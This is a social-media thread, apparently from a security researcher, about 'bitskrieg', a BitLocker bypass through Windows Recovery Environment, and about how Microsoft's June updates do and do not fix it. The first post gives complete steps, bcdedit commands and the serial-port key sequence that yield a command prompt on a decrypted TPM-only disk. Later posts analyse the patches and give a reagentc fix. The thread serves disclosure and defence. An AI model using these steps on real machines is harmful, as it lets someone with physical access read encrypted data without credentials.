Will Dormann5d ago

Well, bitskrieg is public.

While Microsoft "fixed" YellowKey as CVE-2026-45585 (and by "fixed", I mean they have provided manual steps that you can perform if you want to remove autofstx.exe from the WinRE registry BootExecute value), bitskrieg still works on such a system to achieve the same goal (getting access to a TPM-only Bitlocker encrypted disk, without knowing any credentials on the system). Though it requires a second computer, or a device that can communicate on a serial port. VM reproduction requires adding a serial port to the VM. Physical machines can reproduce the same with a supported USB-to-serial device.

1. Boot into WinRe (hold [shift] when clicking reboot button)
2. Go to a command prompt, ignoring the prompt to enter a bitlocker recovery key. (Click Skip this drive)
3. Enable Emergency Management Services (EMS) to use a serial port as the EMS port.

bcdedit /set ems 1
bcdedit /set emsport 1

4. Reboot back into WinRe
5. From your other computer, connect to the serial port.
6. Type:

cmd
[esc]
tab
-
7. Enjoy your cmd.exe prompt (over serial) with a decrypted (assuming it's TPM-only) hard disk.

Note: Depending on the lineage of your Win11 installation, your WinRE experience may not give you a CMD.EXE prompt immediately upon clicking Skip this drive. Instead, it may say Command Prompt is unavailable because the OS drive is locked. If so, the exploit outlined above may not work.

Show threadWill Dormann1d ago

Based on the Publicly disclosed: yes, we can make an educated guess that CVE-2026-50507 is for bitskrieg. Because MSRC doesn't describe their updates in a way that uniquely identify them, educated guesses is the best we can do. (There are three bitlocker bypasses that were fixed today)

If we take a bitskrieg-vulnerable machine and install today's updates, and then attempt to enter WinRE, we get an error:
`A required file couldn't be accessed because your BitLocker key wasn't loaded correctly." Perhaps I'm the only person on the planet who this will happen to, or possibly Microsoft didn't really test their fix for CVE-2026-50507 too well. 🤷‍♂️

We can fix this problem manually in an elevated CMD prompt:

reagentc /disable
reagentc /enable

This will reconfigure WinRE to properly use bitlocker.

After doing this, our once-vulnerable VM will now behave like other Windows systems that may not have been vulnerable to bitskrieg. That is, upon clicking Skip this drive when attempting to get a command prompt in WinRE, we get a message that Command Prompt is unavailable because the OS drive is locked.. From here, the only way to get the command prompt is via the Restart to launch button, which appears to bypass/ignore our attempts to configure the EMS serial port.

Show threadWill Dormann12h ago

Interestingly, while the three bitlocker bypass CVEs in June's updates (CVE-2026-45655, CVE-2026-45658, and CVE-2026-50507), if we take a Windows 11 25H2 VM and install only KB5094126 on it (which fixes all three CVEs), we can see that we can still use the bitskrieg exploit.

If we install all of the updates through June, we get the behavior of needing to reboot to get to Command Prompt via WinRE.

So, for Microsoft to say that KB5094126 is what fixes three bitlocker bypasses is a bit disingenuous. It (alone) does NOT.

Show threadWill Dormann

In fact, we can try the OG YellowKey exploit on a Win11 25H2 system with KB5094126 installed. We should be protected, right?

Get real. If only KB5094126 (which is cumulative, as all Patch Tuesday updates are since 2015, and clocks in at 4.75GB) is installed, then Windows will still be vulnerable to YellowKey.

Did Microsoft attempt to fix YellowKey or bitskrieg? Nobody outside of Microsoft knows. MSRC publications don't say what they fix in any meaningful way. You just install all the updates and hope for the best.

Do we need to worry about this? No, not really. Having a stock Win11 25H2 system and installing only KB5094126 is not something you'd likely see in the real world. People generally install all of the updates.

And a Win11 with all of the updates through June will not allow Command Prompt to be directly entered via WinRE if Bitlocker is enabled for the OS disk.

If it's not KB5094126, which update fixes WinRE so that you can't get to Command Prompt directly? I have no clue. And I definitely don't have the time or patience to figure it out. If you really want to know, take it up with Microsoft.

11:01pmWeb
Show threadMaxim Suhanov3h ago
@wdormann, the reboot is for CVE-2026-20928.
Show threadMaxim Suhanov3h ago
@wdormann, the whole issue was a cold boot attack without "cold" and "boot" (you don't need to freeze something and (re)boot to dump the memory containing secrets).